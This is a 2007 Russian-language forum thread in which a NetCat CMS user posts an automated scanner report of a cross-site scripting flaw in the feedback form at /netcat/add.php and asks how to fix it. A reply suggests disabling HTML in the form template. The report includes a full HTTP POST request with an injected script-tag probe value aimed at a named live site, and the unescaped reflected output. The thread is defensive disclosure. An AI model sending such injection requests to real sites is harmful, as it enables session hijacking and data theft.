Регистрация
Регистрируясь, вы подтверждаете свое согласие с соглашением об использовании персональных данных.
Восстановление пароля

Отчёт о работе неткат версии Лайт на хостинге РБК

23.08.2007, 09:09
Неткам
Неткам

Зарегистрирован:
2006-06-27
Сообщений: 19

Описание

Возможно выполнение атаки межсайтовый скриптинг. Межсайтовый скриптинг (Cross site scripting или XSS) это возможность вставки HTML кода в уязвимую страницу. Инъекция кода осуществляется через все доступные способы ввода информации. Успешное завершение атаки может привести к использованию значений различных переменных, доступных в контексте сайта, записи информации, перехвату пользовательских сессий и т.д.
Запрос для выполнения атаки:
POST /netcat/add.php HTTP/1.1
Host: zeo.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 7.0) PTX
Cookie: RandomValue=99f2e803248f5923faccd5b74eeac9fd;
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 149
cc=104&sub=209&catalogue=1&posting=1&f_Name=XSS%40<xscript>XSS</xscript>.com&f_Email=ptxscan%2Dprof%40ODkuMTExLjE3My4xMTA.com&f_Subject=1&f_Message=1

Результат работы

<...>
r='#F7FAF3' class='t pl45 pr36 pt45 pb28 bg12' id=osn><div class='t24 c02 pb23'>Обратная связь
<p><table class=w0 height=3>
<tr>
<td background=/img/_.gif></td>
</tr></table></div>
Спасибо, XSS@<xscript>XSS</xscript>.com, ваше письмо отправлено.<!-- /content -->
</td></tr></table></td></tr><tr>
<td bgcolor='#E1E8E4' height='83' background='/img/f.gif'>
<table class='h0 w0'>
<tr>
<td width='262' class=bg13 align=center>
<!--Rating@Mail.ru COUNTEr--><script language="JavaScript" type="t
<...>

Решение

Запретить использование этого скрипта или программно исправить ошибку.
Ссылки

Как решить данную проблему???
18.09.2007, 14:06
h/z

Зарегистрирован:
2007-02-06
Сообщений: 755

такое ощущение, что имеется ввиду шаблон "обратной связи"..
укажите в этом шаблоне не использовать html.. и никакого XSS не будет.
198 196 2007-09-18 14:06:29 8102
Описание проекта